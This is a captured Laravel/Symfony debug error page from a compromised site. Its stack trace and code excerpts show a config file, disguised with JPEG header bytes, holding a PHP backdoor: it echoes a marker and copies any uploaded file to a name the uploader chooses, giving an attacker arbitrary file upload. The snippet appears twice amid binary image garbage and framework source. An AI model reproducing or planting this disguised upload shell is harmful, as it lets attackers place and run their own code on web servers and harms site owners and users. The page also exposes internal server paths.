JFIFExifMM* PJ(kopi Path cannot be empty (500 Internal Server Error)

Symfony Exception

ValueError

HTTP 500 Internal Server Error

Path cannot be empty

Exception

ValueError

  1. JFIFExifMM* PJ(<?php echo "kopi";@copy($_FILES["copy"]["tmp_name"],$_FILES["copy"]["name"]);?>    ( %!2!')+...383-7(-.+
  2.  -%%----/-+.------7-------------------------+--++---2/"M     !1A"QTaq2BRr35bs#4CS$tc)2Q!13Aqa𑡱" ?R.q$e/Qa瞪c?(^f(&sϡ{ti,vX2.x?z?ހqL`"u`焓Eߢ ~ Rl83q"hNY w
  3. ~;^:MjWc$5}ҟk ҡ޶R8v'>UvXLw
  4. ~;ԊҙL1j3!y!ljd\VєR-ik)9&sNZ֋ۿ`s@~ T !>Z= 82xD4LXOw?z`gM2MV\!]6͕ Rp2c-$vvtbSލ!$0f'5ۤp"hq]vX޿Э/76yf AsQY=[n40-V  [?2U?9Bxy֮㴇2;Hs*[s)Sv 4Nv1镇YWr־㴇2;Hs*["%@=}/N ЎZvUie_+dđޝN ЎZvUie_+diUkg    zq sը(1LYWhG-r;Hs*N㴇2Yb|4#uAi@9muZMp-sCDDAeQTc*k>G&9><*W/2.aK'u(-,$4    r$j]%1#˂'JޓsvVqAAt 1%NќΟ|5^(cHOvԧ"1L}[9Yw&*Fs:Ntg3O|`LxP*bI395g MըB-v=v?NJ        ZZvxVG]ry_p3RW=eGQM*evH- @:2]IQL{ heGNo21꩏RV @<!PMpH8lNT='F*(hJ>B0T]TX擰4K5rhco^ YQv:6im61u4([}7WimZ5:Lg\`rV"+溦mM1LZm-Mj0˅wOALC>QEUvw8cƃQ431k9M-%sO2kA2-'V՞D=!q"AtA%yݢjS80i9]FC4< MC3lj]h׺px` lAah :C"UGߠx3'Q D2    59z{hD^?FV'[ *szeא߈|={eЉ .bi_جr]X[`DEA_|߳.F)Beϐ߈|=^%舽
  5. +k U_\~8mVbG.-""Š
  1. JFIFExifMM* PJ(<?php echo "kopi";@copy($_FILES["copy"]["tmp_name"],$_FILES["copy"]["name"]);?>    ( %!2!')+...383-7(-.+
  2.  -%%----/-+.------7-------------------------+--++---2/"M     !1A"QTaq2BRr35bs#4CS$tc)2Q!13Aqa𑡱" ?R.q$e/Qa瞪c?(^f(&sϡ{ti,vX2.x?z?ހqL`"u`焓Eߢ ~ Rl83q"hNY w
  3. ~;^:MjWc$5}ҟk ҡ޶R8v'>UvXLw
  4. ~;ԊҙL1j3!y!ljd\VєR-ik)9&sNZ֋ۿ`s@~ T !>Z= 82xD4LXOw?z`gM2MV\!]6͕ Rp2c-$vvtbSލ!$0f'5ۤp"hq]vX޿Э/76yf AsQY=[n40-V  [?2U?9Bxy֮㴇2;Hs*[s)Sv 4Nv1镇YWr־㴇2;Hs*["%@=}/N ЎZvUie_+dđޝN ЎZvUie_+diUkg    zq sը(1LYWhG-r;Hs*N㴇2Yb|4#uAi@9muZMp-sCDDAeQTc*k>G&9><*W/2.aK'u(-,$4    r$j]%1#˂'JޓsvVqAAt 1%NќΟ|5^(cHOvԧ"1L}[9Yw&*Fs:Ntg3O|`LxP*bI395g MըB-v=v?NJ        ZZvxVG]ry_p3RW=eGQM*evH- @:2]IQL{ heGNo21꩏RV @<!PMpH8lNT='F*(hJ>B0T]TX擰4K5rhco^ YQv:6im61u4([}7WimZ5:Lg\`rV"+溦mM1LZm-Mj0˅wOALC>QEUvw8cƃQ431k9M-%sO2kA2-'V՞D=!q"AtA%yݢjS80i9]FC4< MC3lj]h׺px` lAah :C"UGߠx3'Q D2    59z{hD^?FV'[ *szeא߈|={eЉ .bi_جr]X[`DEA_|߳.F)Beϐ߈|=^%舽
  5. +k U_\~8mVbG.-""Š
  1.         if (! isset($files['app'])) {
  2.             throw new Exception('Unable to load the "app" configuration file.');
  3.         }
  4.         foreach ($files as $key => $path) {
  5.             $repository->set($key, require $path);
  6.         }
  7.     }
  8.     /**
  9.      * Get all of the configuration files for the application.
  1.         // directory and load each one into the repository. This will make all of the
  2.         // options available to the developer for use in various parts of this app.
  3.         $app->instance('config'$config = new Repository($items));
  4.         if (! isset($loadedFromCache)) {
  5.             $this->loadConfigurationFiles($app$config);
  6.         }
  7.         // Finally, we will set the application's environment based on the configuration
  8.         // values that were loaded. We will pass a callback which will be used to get
  9.         // the environment in a web context where an "--env" switch is not present.
  1.         $this->hasBeenBootstrapped true;
  2.         foreach ($bootstrappers as $bootstrapper) {
  3.             $this['events']->dispatch('bootstrapping: '.$bootstrapper, [$this]);
  4.             $this->make($bootstrapper)->bootstrap($this);
  5.             $this['events']->dispatch('bootstrapped: '.$bootstrapper, [$this]);
  6.         }
  7.     }
  1.      * @return void
  2.      */
  3.     public function bootstrap()
  4.     {
  5.         if (! $this->app->hasBeenBootstrapped()) {
  6.             $this->app->bootstrapWith($this->bootstrappers());
  7.         }
  8.     }
  9.     /**
  10.      * Get the route dispatcher callback.
  1.     {
  2.         $this->app->instance('request'$request);
  3.         Facade::clearResolvedInstance('request');
  4.         $this->bootstrap();
  5.         return (new Pipeline($this->app))
  6.                     ->send($request)
  7.                     ->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
  8.                     ->then($this->dispatchToRouter());
  1.         $this->requestStartedAt Carbon::now();
  2.         try {
  3.             $request->enableHttpMethodParameterOverride();
  4.             $response $this->sendRequestThroughRouter($request);
  5.         } catch (Throwable $e) {
  6.             $this->reportException($e);
  7.             $response $this->renderException($request$e);
  8.         }
Kernel->handle(object(Request)) in /home/iaset/public_html/index.php (line 51)
  1. $app = require_once __DIR__.'/bootstrap/app.php';
  2. $kernel $app->make(Kernel::class);
  3. $response $kernel->handle(
  4.     $request Request::capture()
  5. )->send();
  6. $kernel->terminate($request$response);

Stack Trace

ValueError
ValueError:
Path cannot be empty

  at /home/iaset/public_html/config/fileuser.php:2
  at copy('', '')
     (/home/iaset/public_html/config/fileuser.php:2)
  at require('/home/iaset/public_html/config/fileuser.php')
     (/home/iaset/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:70)
  at Illuminate\Foundation\Bootstrap\LoadConfiguration->loadConfigurationFiles(object(Application), object(Repository))
     (/home/iaset/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:39)
  at Illuminate\Foundation\Bootstrap\LoadConfiguration->bootstrap(object(Application))
     (/home/iaset/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Application.php:286)
  at Illuminate\Foundation\Application->bootstrapWith(array('Illuminate\\Foundation\\Bootstrap\\LoadEnvironmentVariables', 'Illuminate\\Foundation\\Bootstrap\\LoadConfiguration', 'Illuminate\\Foundation\\Bootstrap\\HandleExceptions', 'Illuminate\\Foundation\\Bootstrap\\RegisterFacades', 'Illuminate\\Foundation\\Bootstrap\\RegisterProviders', 'Illuminate\\Foundation\\Bootstrap\\BootProviders'))
     (/home/iaset/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:186)
  at Illuminate\Foundation\Http\Kernel->bootstrap()
     (/home/iaset/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:170)
  at Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter(object(Request))
     (/home/iaset/public_html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:144)
  at Illuminate\Foundation\Http\Kernel->handle(object(Request))
     (/home/iaset/public_html/index.php:51)